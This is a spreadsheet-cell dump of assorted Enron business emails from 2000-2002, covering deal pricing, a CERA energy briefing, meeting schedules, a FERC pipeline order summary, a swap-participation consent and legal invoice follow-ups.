_x000D_
_x000D_
_x000D_
Melissa Ann Murphy_x000D_
03/07/2001 01:34 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: 537565.01_x000D_
_x000D_
Hi Kate, Lindy Conrad a trader from Seattle City Light called me today.  She _x000D_
thinks the price for deal # 537565.01 should be $360.00 instead of $350.00.  _x000D_
She said that Sean Crandall was our trader.  _x000D_
_x000D_
Let me know what you find out._x000D_
Thanks,_x000D_
Melissa_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Jul 2001 07:11:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.millar@enron.com', 'ken.powers@enron.com', 'jan.moore@enron.com', 'dave.neubauer@enron.com', 'frank.oldenhuis@enron.com', 'eric.gadd@enron.com', 'loren.penkava@enron.com', 'john.dushinske@enron.com', 'vernon.mercaldo@enron.com', 'larry.swett@enron.com', 'chuck.wilkinson@enron.com', 'courtney.barker@enron.com', 'craig.buehler@enron.com', 'laura.lantefield@enron.com', 'michael.ratner@enron.com', 'steve.gilbert@enron.com', 'bob.stevens@enron.com', 'tom.halpin@enron.com', 'kent.miller@enron.com', 'susan.scott@enron.com', 'mike.barry@enron.com', 'kay.threet@enron.com', 'rick.dietz@enron.com', 'tk.lohman@enron.com', 'lon.stanton@enron.com', 'vicki.berg@enron.com', 'jeff.nielsen@enron.com', 'kevin.hyatt@enron.com', 'lisa.valley@enron.com', 'tim.johanson@enron.com', 'frank.semin@enron.com', 'allen.cohrs@enron.com', 'penny.mccarran@enron.com', 'w..mcgowan@enron.com', 'jo.williams@enron.com', 'martha.janousek@enron.com', 'jane.joyce@enron.com', 'robert.mason@enron.com', 'g..stage@enron.com', 'john.pritchard@enron.com', 'donna.scott@enron.com', 'lee.huber@enron.com', 'sean.bolks@enron.com', 'larry.pavlou@enron.com', 'steve.thomas@enron.com', 'dana.jones@enron.com', 'michael.loeffler@enron.com', 'shelley.corman@enron.com', 'stephanie.korbelik@enron.com', 'janet.bowers@enron.com', 'bob.burleson@enron.com', 'reyna.cabrera@enron.com', 'lee.ferrell@enron.com', 'john.fiscus@enron.com', 'sheila.nacey@enron.com', 'glen.hass@enron.com', 'preston.roobaert@enron.com', 'stephen.herber@enron.com', 'steven.harris@enron.com', 'sue.neville@enron.com', 'david.marye@enron.com', 'kimberly.watson@enron.com', 'don.powell@enron.com', 'steve.weller@enron.com', 'steven.january@enron.com', 'rob.wilson@enron.com', 'lynn.blair@enron.com', 'sarabeth.smith@enron.com', 'lorraine.lindberg@enron.com', 'lindy.donoho@enron.com', 'pallavi.goradia@enron.com', 'chris.sebesta@enron.com', 'theresa.branney@enron.com', 'michelle.lokay@enron.com', 'karen.lagerstrom@enron.com', 'bill.fowler@enron.com', 'joni.bollinger@enron.com'})</t>
  </si>
  <si>
    <t>FW: Western Energy--Fundamentals and Regulations Change Outlooks -_x000D_
 CERA Monthly Briefing</t>
  </si>
  <si>
    <t>CERA's monthly briefing is on the Western Market for the rest of the summer and into winter. To print off, use the PDF version._x000D_
There are some hydroelectric projections in one of the tables that may be helpful, as well as electricity and electric price projections.  Also, there are gas demand projections for the current quarter only.  The last page reiterates the Candian supply situation that was discussed in last week's confrence call with CERA._x000D_
_x000D_
Lorna_x000D_
_x000D_
 _x000D_
Title: A Shifting Market Landscape_x000D_
URL(s):_x000D_
http://www20.cera.com/eprofile?u=35&amp;m=2527_x000D_
_x000D_
***********************************************************************_x000D_
_x000D_
FUNDAMENTALS AND REGULATIONS CHANGE WESTERN ENERGY OUTLOOKS_x000D_
_x000D_
Western energy markets are heading into summer with shifts in the fundamental_x000D_
and regulatory environment. New forces will reduce pressures on prices and_x000D_
reliability as the power peak builds._x000D_
_x000D_
*  The June 19 FERC Order represents a strong dampener of power prices._x000D_
_x000D_
*  Energy demand is off considerably on a year-over-year basis._x000D_
_x000D_
*  Lower energy demand has contributed to an easing in natural gas prices in_x000D_
California, but higher summer loads will likely bring higher gas prices._x000D_
_x000D_
_x000D_
**end**_x000D_
_x000D_
Follow above URL for complete Monthly Briefing (9 printed pages)._x000D_
_x000D_
_x000D_
_x000D_
E-mail Category: Monthly Briefing_x000D_
CERA Knowledge Area(s): Western Energy_x000D_
_x000D_
_x000D_
***********************************************************************_x000D_
_x000D_
To make changes to your cera.com profile go to:_x000D_
http://www20.cera.com/client/updateaccount_x000D_
_x000D_
Forgot your username and password? Go to:_x000D_
http://www20.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20.cera.com/tos_x000D_
Questions/Comments: webmaster@cera.com_x000D_
Copyright 2001. Cambridge Energy Research Associates</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 10:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'janel.guerrero@enron.com', 'linda.robertson@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'howard.fromer@enron.com', 'mark.palmer@enron.com', 'paul.kaufman@enron.com', 'susan.landwehr@enron.com', 'richard.shapiro@enron.com', 'joe.hartsoe@enron.com', 'daniel.allegretti@enron.com'})</t>
  </si>
  <si>
    <t>Campaign Leadership Call (Another Change!!!!!!)</t>
  </si>
  <si>
    <t xml:space="preserve">Please make note of the new schedule for the Campaign Leadership Call:_x000D_
_x000D_
Call will now take place on Monday's &amp; Thursday's @ 4:30 PM (CDT).  The next _x000D_
call is scheduled for Thursday, April 5._x000D_
_x000D_
_x000D_
Don't hesitate to call me if you have any questions._x000D_
_x000D_
gngr_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Ginger Dernehl/NA/Enron on 04/02/2001 _x000D_
04:35 PM ---------------------------_x000D_
_x000D_
_x000D_
Ginger Dernehl_x000D_
03/26/2001 02:05 PM_x000D_
To: Mark Palmer/Corp/Enron@ENRON, James D Steffes/NA/Enron@Enron, Janel _x000D_
Guerrero/Corp/Enron@Enron, Paul Kaufman/PDX/ECT@ECT, Jeff _x000D_
Dasovich/NA/Enron@Enron, Howard Fromer/NA/Enron@Enron, Joe _x000D_
Hartsoe/Corp/Enron@ENRON, Linda Robertson/NA/Enron@ENRON, Richard _x000D_
Shapiro/NA/Enron@Enron, Susan M Landwehr/NA/Enron@Enron, Daniel _x000D_
Allegretti/NA/Enron@Enron_x000D_
cc: Cindy Derecskey/Corp/Enron@Enron, Marcia A Linton/NA/Enron@Enron, Linda J _x000D_
Noske/HOU/ECT@ECT, Lysa Akin/PDX/ECT@ECT, Joseph Alamo/NA/Enron@Enron, _x000D_
Bernadette Hawkins/Corp/Enron@ENRON, Lora Sullivan/Corp/Enron@ENRON, Ginger _x000D_
Dernehl/NA/Enron@Enron, Terri Miller/NA/Enron@Enron _x000D_
_x000D_
Subject: (Change in time of call) Campaign Leadership Call _x000D_
_x000D_
Please make note of the change in time of the  "Campaign Leadership Call" .  _x000D_
Beginning Tuesday, March 27, 2001 the call will take place daily at 4:30pm _x000D_
CST instead of 11:30am CST.  The dial in number and location for this call _x000D_
will remain the same._x000D_
_x000D_
Thanks and please call if you have any questions._x000D_
_x000D_
gngr_x000D_
713-853-7751_x000D_
----- Forwarded by Ginger Dernehl/NA/Enron on 03/26/2001 01:14 PM -----_x000D_
_x000D_
	Ginger Dernehl_x000D_
	03/23/2001 05:22 PM_x000D_
		 _x000D_
		 To: Mark Palmer/Corp/Enron@ENRON, James D Steffes/NA/Enron@Enron, Janel _x000D_
Guerrero/Corp/Enron@Enron, Paul Kaufman/PDX/ECT@ECT, Jeff _x000D_
Dasovich/NA/Enron@Enron, Howard Fromer/NA/Enron@Enron, Joe _x000D_
Hartsoe/Corp/Enron@ENRON, Linda Robertson/NA/Enron@ENRON, Richard _x000D_
Shapiro/NA/Enron@Enron, Susan M Landwehr/NA/Enron@Enron, Daniel _x000D_
Allegretti/NA/Enron@Enron_x000D_
		 cc: Cindy Derecskey/Corp/Enron@Enron, Marcia A Linton/NA/Enron@Enron, Linda _x000D_
J Noske/HOU/ECT@ECT, Lysa Akin/PDX/ECT@ECT, Joseph Alamo/NA/Enron@Enron, _x000D_
Bernadette Hawkins/Corp/Enron@ENRON, Lora Sullivan/Corp/Enron@ENRON, Ginger _x000D_
Dernehl/NA/Enron@Enron, Terri Miller/NA/Enron@Enron_x000D_
		 Subject: Campaign Leadership Call_x000D_
_x000D_
Beginning Monday, March 26, 2001 there will be a daily "Campaign Leadership _x000D_
Call".  This conference call was referenced in a memo sent via e:mail by Rick _x000D_
this afternoon, Friday, March 23.  Please remember to mark your calendars _x000D_
accordingly._x000D_
_x000D_
Date:  Daily, beginning Monday, March 26, 2001_x000D_
_x000D_
Time:  11:30am - 12:00pm (CST) call to last 1/2 hour_x000D_
_x000D_
Number: 1-800-283-1805_x000D_
_x000D_
Location: EB4701 (for those in Houston)_x000D_
_x000D_
Feel free to call me if you have any additional questions or concerns._x000D_
_x000D_
gngr_x000D_
713-853-7751_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 Aug 2000 11:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Additional Information:  Access Request (DJFR-4NGPA6)</t>
  </si>
  <si>
    <t>Additional Information for Security Resource Request  DJFR-4NGPA6 has been _x000D_
provided by Security._x000D_
_x000D_
To view the request, double click your left mouse button on the Notes _x000D_
document link below.</t>
  </si>
  <si>
    <t>Wed, 17 May 2000 12:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'clement.lau@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'benjamin.rogers@enron.com', 'jinsung.myung@enron.com'})</t>
  </si>
  <si>
    <t>Re: FINANCIAL RESTRUCTURING</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Clement Lau/HOU/ECT on 05/17/2000 07:00 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Mitch Robinson @ ENRON                           05/17/2000 06:42 PM_x000D_
	_x000D_
_x000D_
To: Clement Lau/HOU/ECT@ECT@ENRON_DEVELOPMENT_x000D_
cc: Chaundra Perry/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Tom _x000D_
Callaghan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Don _x000D_
Miller/HOU/ECT@ECT@ENRON_DEVELOPMENT _x000D_
Subject: Re: FINANCIAL RESTRUCTURING  _x000D_
_x000D_
To all -_x000D_
_x000D_
I'll have to call in.  Clement, once you're set up in 3AC, please call my _x000D_
assistant Felecia at 35709 or me at 33957 and I'll patch in._x000D_
_x000D_
Mitch_x000D_
_x000D_
_x000D_
_x000D_
Clement Lau@ECT_x000D_
05/17/2000 06:39 PM_x000D_
To: Chaundra Perry/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Mitch Robinson@Enron@ENRON_DEVELOPMENT, Tom _x000D_
Callaghan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Don Miller/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: FINANCIAL RESTRUCTURING  _x000D_
_x000D_
I will be able to meet if it fits everyone's schedule. I will be in the _x000D_
office till late tonight._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chaundra Perry@ENRON_DEVELOPMENT_x000D_
05/17/2000 04:32 PM_x000D_
To: Mitch Robinson@Enron, Clement Lau@ECT, Tom _x000D_
Callaghan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Don Miller@ECT_x000D_
cc:  _x000D_
Subject: FINANCIAL RESTRUCTURING_x000D_
_x000D_
Mitch - Tom will be in the office tomorrow.  He can meet at 8:30am.  The _x000D_
meeting location is 3AC1575._x000D_
_x000D_
Thanks,_x000D_
Chaundra_x000D_
---------------------- Forwarded by Chaundra Perry/ENRON_DEVELOPMENT on _x000D_
05/17/2000 04:34 PM ---------------------------_x000D_
_x000D_
_x000D_
Chaundra Perry_x000D_
05/17/2000 04:00 PM_x000D_
To: Mitch Robinson@Enron, Clement Lau@ECT, Tom _x000D_
Callaghan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: FINANCIAL RESTRUCTURING_x000D_
_x000D_
Mitch,_x000D_
_x000D_
Per your request, I am having copies of the 2000 budget for the 1999 and 2000 _x000D_
Peakers delivered to you and Clement.  You should receive them within the _x000D_
hour.  I contacted Tom and informed him you are requesting a meeting to _x000D_
discuss the current estimate for each site.   He indicated he would be _x000D_
available for a conference call tomorrow morning.   He was in the process of _x000D_
catching his flight and stated he would contact me in the morning._x000D_
_x000D_
Thanks,_x000D_
Chaundra_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 08:43:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'suzanne.calcagno@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'robert.allwein@enron.com', 'robert.superty@enron.com', 'donna.greif@enron.com', 'judy.townsend@enron.com', 'jeffrey.molinaro@enron.com', 'mark.breese@enron.com', 'tammy.jaquet@enron.com', 'l..kelly@enron.com', 'chris.germany@enron.com', 'lia.halstead@enron.com', 'victor.lamadrid@enron.com', 'clarissa.garcia@enron.com', 'donna.fulton@enron.com', 'w..cantrell@enron.com'})</t>
  </si>
  <si>
    <t>Hi All--_x000D_
_x000D_
Attached is the Inside FERC summary of the FERC's order in the Transco 1Line / Order 637 proceeding and in the Texas Gas cash-out proceeding._x000D_
_x000D_
Transco is saying they won't implement "prior to April 1" but haven't decided on an implementation and training schedule as of yet. .The Order did not specify a date by which Transco had to implement.  Transco will have to make another filing to comply with this Order, so it may still be a little while before everything is finalized.  Given that the FERC did not speak to the cost of the system in this order (almost $80m), it's likely that the dollars will be subject to the on-going negotiations taking place in Transco's RP01-245 rate case proceeding.   I'll coordinate with Tammy to insure that we've got the necessary EDI testing plan in place and that we make the necessary Unify changes._x000D_
_x000D_
On Texas Gas, this represents a minor win for us--we had argued that Texas Gas' proposal was not consistent with Order 637 and that they should adopt a more "Transco-like" scheme that creates uncertainty w/o creating undue penalties.  Texas Gas will have to refile &amp; we'll have another go-round between the marketing companies/producers and the LDC's on the Texas Gas system.  Will keep you posted._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Suzanne_x000D_
x54880_x000D_
=============================================================================================================_x000D_
TRANSCO GETS GREEN LIGHT TO IMPLEMENT 1LINE SYSTEM, OTHER RATE CHANGES_x000D_
_x000D_
Capping a long-running debate over the 1Line proposal, Transcontinental Gas Pipe Line Corp., with only a minor exception or two, received approval from FERC to implement a new online, interactive computer system. Last month's ruling also went a long way toward completing Transco's effort to comply with orders 637 and 587.  The 1Line system was proposed to enable Transco and other subsidiaries of The Williams Cos. Inc. to put in place new practices and services, including ones related to compliance with orders 637 and 587._x000D_
_x000D_
According to Transco, its new scheme cannot be supported by its existing computer systems. But the commission last spring said it was not satisfied with Transco's proposal and asked for a more detailed explanation of how 1Line complies with orders 637 and 587 (IF, 2 April, 16). Looking at the 1Line plan from an order 637 and 587 perspective, FERC in the Sept. 27 order (RP01-236, et al.) found most of the scheme to its liking. It accepted Transco's proposal to change the capacity-release bidding and awarding processes, to incorporate pooling services in its tariff as a new pooling rate schedule, and to provide that any adjustments to a demand bill will be included in a subsequent demand bill, rather than the subsequent commodity bill._x000D_
_x000D_
The commission approved Transco's proposal on scheduling equality, which allows shippers acquiring released capacity to submit a nomination at the earliest opportunity after the acquisition of capacity. To raise its comfort level about the provision, FERC directed Transco to change the tariff to permit a shipper's nomination to coincide with the notification of the capacity release transaction and to remove restrictions on the releasing shipper's ability to specify when the release will become effective. FERC also generally was pleased with the provision directing customers to indemnify and hold harmless Transco against all claims. In response to one protester, the commission told the company to remove language that would force customers to indemnify Transco's affiliates as well._x000D_
_x000D_
On order 637 matters, FERC was mostly sympathetic to Transco's positions on issues such as imbalance services, operational controls and penalty revenue sharing._x000D_
FERC was less enthused with Transco's preferred approach to interaction between the pipeline's segmentation and discounting policies. Refuting the claim that it already complies with order 637 on this issue, FERC directed Transco to add language to its tariff creating a presumption that Transco can rebut a segmenting shipper's right to retain a discounted rate as long as Transco demonstrates that a segmented or secondary point is not similarly situated to point identified in the original transaction. Transco also must add a procedure to its tariff that requires requests to retain discounts to be processed within two hours._x000D_
_x000D_
FERC also accepted Transco's existing imbalance cash-out tolerances and tiered cash-out mechanisms, but wanted more information on proposed unauthorized overrun penalties. The pipeline has not ad-equately justified "why such substantial overrun penalties should apply on non-critical days," said the_x000D_
commission. FERC rejected Transco's proposed transportation charge for imbalance trading, which the pipeline said was needed to recover what it asserts are lost transportation charges. The commission ruled that "Transco has failed to demonstrate that imbalance trades between zones necessarily results in a loss of transportation revenue." But the commission went on to say that it "may be willing to reconsider a remedy if Transco can show that shippers are abusing imbalance trading" to avoid certain charges._x000D_
_x000D_
Transco also was directed to justify its proposal to prohibit shippers from trading transportation imbalances and operational balancing agreement imbalances. FERC said that "it is not clear from Transco's explanation why OBA imbalances are so different from shipper transportation imbalances that the two cannot be traded."_x000D_
_x000D_
=============================================================================================================_x000D_
FERC ACCEPTED TEXAS GAS' PROPOSAL TO ELIMINATE IMBALANCES on its system by revising its cashout mechanism, while rejecting the proposed use of high/low daily pricing for cashouts. The revamped mechanism, which was developed during and after a technical conference, would enable Texas Gas Transmission Co. to "remove the incentive to engage in price arbitrage on its system," FERC said._x000D_
_x000D_
To stop customers from gaming its system, Texas Gas in March proposed (RP01-278) a plan to create a new monthly imbalance tier that would not be subject to cashouts, to eliminate pool-to-pool transfers in the calculation of customer imbalances, and to do away with the provision allowing a processor replacing_x000D_
plant volume reduction to have its imbalances cashed out at 100% of the applicable index price. Seeing the need for the proposed changes, the commission noted that Texas Gas "has demonstrated with its data a close correlation between the imbalance and price arbitrage that has been taking place for years and has not subsided."_x000D_
_x000D_
However, FERC rejected the idea of changing the applicable cashout price index at all tier levels to a percentage of either the highest or lowest daily price during the month. Directing Texas Gas to drop the proposed language, the order explained that daily high/low index prices "may unduly increase penalties for imbalances, which is contrary to order 637."_x000D_
_x000D_
The order went on to say that "a less draconian measure" may be appropriate. For instance, Texas Gas could propose a mechanism "that would inject an element of uncertainty regarding the eventual price" if it wanted to provide "an incentive for shippers to remain in balance," FERC said.</t>
  </si>
  <si>
    <t>Tue, 8 Jan 2002 11:38:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kenneth.cessac@enron.com', 'jean.adams@enron.com', 'scott.hibbard@enron.com', 'debra.scurlock@enron.com', 'sherry.forbish@enron.com', 'gary.spraggins@enron.com', 'randy.janzen@enron.com', 'janet.mcdaniel@enron.com', 'larry.berger@enron.com', 'robert.benningfield@enron.com', 'kathy.sturr@enron.com', 'chris.greaney@enron.com', 'penny.mccarran@enron.com', 'g..stage@enron.com', 'harry.woodson@enron.com', 'angela.mendez@enron.com', 'steve.january@enron.com', 'stephen.herber@enron.com', 'terry.kowalke@enron.com', 'mary.darveaux@enron.com', 'lynn.blair@enron.com', 'rick.kile@enron.com', 'john.buchanan@enron.com', 'darrell.schoolcraft@enron.com'})</t>
  </si>
  <si>
    <t>Report for Jan 5th &amp; 6th</t>
  </si>
  <si>
    <t>There looks like there are some measurment problems.  Therefore this report has not been done for these days.  Checking with measurement regarding the variances between scheduled and actuals_x000D_
_x000D_
Kathy</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 07:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'support@hotwire.com'})</t>
  </si>
  <si>
    <t>Requested Hotwire Info</t>
  </si>
  <si>
    <t>Eric Bass_x000D_
_x000D_
Here is the information you requested from us. The password hint you provided _x000D_
when you registered with Hotwire is:_x000D_
_x000D_
Personal ID (HS)_x000D_
_x000D_
If you need any further assistance, check the FAQ's in the Help section of _x000D_
our web site, or call (toll free) 888-362-1234 any time._x000D_
_x000D_
Thank you for using Hotwire - your inside connection to the best online _x000D_
deals!</t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 05:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>message/request for Ken Lay</t>
  </si>
  <si>
    <t>Rosalee - would you please forward this request to Ken.  If he has some time _x000D_
over the coming week or so to discuss by phone, I would also appreciate that _x000D_
opportunity.  _x000D_
_x000D_
Ken - Though a mutual acquaintance, my CV has been provided to Bob Zoellick, _x000D_
in the hope and expectation that he might become USTR, and with an interest _x000D_
on my part in being nominated to be one of his deputies.  I am writing to _x000D_
seek any support and assistance you feel comfortable in providing in this _x000D_
effort.  I attach a copy of my CV below.  I would particularly call attention _x000D_
to the fact that I served in the Department of Energy as a Deputy General _x000D_
Counsel in the administration of the first President Bush.  While I obviously _x000D_
could not contribute much time to the campaign given my current assignment _x000D_
within Enron, I did contribute financially.  My wife and I gave $2,000 to the _x000D_
campaign to fund the primary effort, $2,000 for the General Election, and _x000D_
another $2,000 to the Compliance Fund.  I also wrote letters seeking funds _x000D_
(using your fund-raising number), and while I do not think the response rate _x000D_
was high, I do know that at least some of the people I wrote to did _x000D_
contribute._x000D_
_x000D_
I have discussed this interest in the Deputy USTR role only with Steve Kean _x000D_
and Richard Shapiro within Enron.  I expect that if Bob is nominated in the _x000D_
next few weeks, that I will be making a trip to Washington to meet with him, _x000D_
as part a trip associated with some other US business.  (And if Bob is not _x000D_
the USTR, I will, of course, remain interested in the role.)  When it is _x000D_
convenient, I would be pleased to discuss this further with you.  Enjoy your _x000D_
holidays.  Mark</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 14:41:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 05:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'blair.fleming@rbcds.com'})</t>
  </si>
  <si>
    <t>Alberta Gas Prepay and Assignment to BTM</t>
  </si>
  <si>
    <t xml:space="preserve">Blair:  I sent this to you yesterday.  Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 12/14/2000 01:27 PM -----_x000D_
_x000D_
	Sara Shackleton_x000D_
	12/13/2000 08:50 AM_x000D_
		 _x000D_
		 To: blair.fleming@rbcds.com_x000D_
		 cc: Sarah Heineman/HOU/ECT@ECT, Brian Kerrigan/HOU/ECT@ECT_x000D_
		 Subject: Alberta Gas Prepay and Assignment to BTM_x000D_
_x000D_
_x000D_
Attached below is a redline version of the consent which has been approved by _x000D_
Enron Canada Corp._x000D_
_x000D_
Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 12/13/2000 08:52 AM -----_x000D_
_x000D_
	Sara Shackleton_x000D_
	12/12/2000 02:05 PM_x000D_
		 _x000D_
		 To: Greg Johnston/CAL/ECT_x000D_
		 cc: Sarah Heineman/HOU/ECT@ECT_x000D_
		 Subject: Alberta Gas Prepay and Assignment to BTM_x000D_
_x000D_
Greg:_x000D_
_x000D_
I received the following email from RBC and am attaching a redline of _x000D_
changes.  Since ECC will be signing, let me know if you have any objections.  _x000D_
Sara_x000D_
_x000D_
_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 12/12/2000 02:03 PM -----_x000D_
_x000D_
	"Fleming, Blair " &lt;blair.fleming@rbcds.com&gt;_x000D_
	12/08/2000 02:39 PM_x000D_
		 _x000D_
		 To: "'Sara.Shackleton@enron.com'" &lt;Sara.Shackleton@enron.com&gt;, _x000D_
"'sarah.heineman@enron.com'" &lt;sarah.heineman@enron.com&gt;, _x000D_
"'kelly.boots@enron.com'" &lt;kelly.boots@enron.com&gt;, "Fleming, Blair " _x000D_
&lt;blair.fleming@rbcds.com&gt;_x000D_
		 cc: "Darby, Giles" &lt;Giles.Darby@rbcds.com&gt;_x000D_
		 Subject: Alberta Gas Prepay and Assignment to BTM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
As you are aware, we are finalizing the participation of Bank of _x000D_
Tokyo-Mitsubishi (BTM) into the Alberta Gas Prepay financing.? _x000D_
_x000D_
Recall there are three swaps:_x000D_
_x000D_
(a) Commodity Swap between Enron Canada and RBC(b) Commodity Swap between _x000D_
Chase and RBC(c) Interest Rate Swap between Enron Canada and RBC_x000D_
_x000D_
We will be participating BTM into the agreements to which Enron is party [(a) _x000D_
and (c) above].? As a result of this, Enron will not be re-signing any new _x000D_
ISDA's etc.?? However, Section 7 to the ISDA Master agreement governing _x000D_
Transfers requires the prior written consent for any transfer of "any _x000D_
interest or obligation" under the Agreement.? Our view is that the _x000D_
participation to BTM does qualify as a tranfer of an any "interest or _x000D_
obligation", ergo we need Enron's consent.? Attached please find a proposed _x000D_
Consent from Enron prepared by my lawyer.? This is the only document that we _x000D_
require signed by Enron.? Please take note of the key language contained _x000D_
therein:_x000D_
_x000D_
??????? "Enron hereby consents to RBC assigning a 50% participation interest _x000D_
in the Swap Documents to Bank of Tokyo-???? ?????? Mitsubishi, Ltd., New York _x000D_
Branch; provided that (a) RBC's rights and obligations under the Swap _x000D_
Documents shall remain ??????? unchanged, (b) RBC shall remain solely _x000D_
responsible to Enron for the performance of such obligations and (c) Enron _x000D_
shall ??????? continue to deal solely and directly with RBC in connection _x000D_
with RBC's rights and obligations under the Swap Documents."_x000D_
_x000D_
The commodity swap between Chase and RBC will be "split" and each of RBC and _x000D_
BTM will have a Swap with Chase for one-half the amount._x000D_
_x000D_
Sara(s), please advise whether you are comfortable with our approach and _x000D_
whether you require any changes to the Consent.? BTM has reviewed the _x000D_
Participation agreement and is moving forward to getting the doc's approved _x000D_
internally...we're targeting for a close mid next week (the week of Dec 11) _x000D_
and accordingly your execution of the Consent within that timeframe would be _x000D_
much appreciated.? Given that you continue to deal in all ways with RBC, I _x000D_
have not forwarded you a copy of the Participation agreement...._x000D_
_x000D_
Thanks and have a good weekend!_x000D_
_x000D_
-----Original Message-----From:?? Rick Borden _x000D_
[SMTP:Rick.Borden@macleoddixon.com]Sent:?? Thursday, December 07, 2000 5:47 _x000D_
PMTo:???? blair.fleming@rbcds.comSubject:??????? Enron Canada Corp. _x000D_
[Comment]??_x000D_
_x000D_
Please see the attached Consent. _x000D_
_x000D_
Richard P. BordenMacleod Dixon LLP3700 Canterra Tower400 - 3rd Avenue _x000D_
S.W.Calgary, Alberta? T2P 4H2Tel:? (403) 267-8362Fax:? (403) 264-5973E-mail:? _x000D_
rick.borden@macleoddixon.com_x000D_
_x000D_
&lt;&lt;MACLEOD-.doc&gt;&gt; _x000D_
_x000D_
 - MACLEOD-.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 00:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: energy type</t>
  </si>
  <si>
    <t xml:space="preserve">These have been changed to Firm energy._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sharen Cason                           03/02/2001 11:23 AM_x000D_
	_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: energy type_x000D_
_x000D_
I've got two deals where the energy type and del point don't match._x000D_
_x000D_
#536538_x000D_
#536537_x000D_
_x000D_
Thanks!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 09:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'carolyn.cooney@enron.com'})</t>
  </si>
  <si>
    <t>Inaugural Memo and Fax Form</t>
  </si>
  <si>
    <t xml:space="preserve">Steve,_x000D_
_x000D_
As you discussed with Linda on Friday attached is a proposed memo for _x000D_
distribution._x000D_
_x000D_
If you have any questions please let us know._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Carolyn_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 01:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: In re M/V PACIFIC VIRGO/Re: WFW - pacific virgo invoices</t>
  </si>
  <si>
    <t xml:space="preserve">Britt --_x000D_
_x000D_
I do not have a copy of the WFW invoice.  I have requested same from Angeline _x000D_
and she indicated she would be forwarding to it to me.  I will forward on to _x000D_
you when I receive it._x000D_
_x000D_
Linda Guinn_x000D_
Enron North America_x000D_
1400 Smith Street_x000D_
Houston, Texas  77002_x000D_
(713) 853-6104_x000D_
(713) 646-3393 (fax)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Britt Davis@ENRON_x000D_
	12/12/2000 09:05 AM_x000D_
		 _x000D_
		 To: Linda R Guinn/HOU/ECT@ECT_x000D_
		 cc: Alan Aronowitz/HOU/ECT@ECT, Richard B Sanders/HOU/ECT@ECT_x000D_
		 Subject: In re M/V PACIFIC VIRGO/Re: WFW - pacific virgo invoices_x000D_
_x000D_
Linda,_x000D_
_x000D_
Could you send the WFW bill down to me please?  I just changed admin _x000D_
assistants and my new a/a, Lee, could not find that in the file.  Richard _x000D_
wanted me to take a look and try to apportion it between his r/c and Alan's, _x000D_
given my statement to Richard that the WFW bill contains a lot of time that I _x000D_
(and I believe Matt shares this belief) was directed to resolution of the _x000D_
dispute with FGH.  _x000D_
_x000D_
Britt_x000D_
_x000D_
P.S. to Matt-- what do you think about asking Neale if he would take a look _x000D_
at that bill and apportion the time spent between the cargo claim versus the _x000D_
FGH matter?_x000D_
----- Forwarded by Britt Davis/Corp/Enron on 12/12/2000 09:01 AM -----_x000D_
_x000D_
	Angeline Poon@ECT_x000D_
	12/11/2000 08:08 PM_x000D_
		_x000D_
		 To: Linda R Guinn/HOU/ECT@ECT_x000D_
		 cc: Richard B Sanders/HOU/ECT@ECT, Britt Davis/Corp/Enron@ENRON_x000D_
		 Subject: Re: WFW - pacific virgo invoices_x000D_
_x000D_
Hi Linda_x000D_
_x000D_
I have just faxed to you the statement that reflects the various items _x000D_
charged by Watson Farley, which was attached to Watson's invoice.  My _x000D_
apologies for any inconvenience caused._x000D_
_x000D_
Angie_x000D_
_x000D_
_x000D_
_x000D_
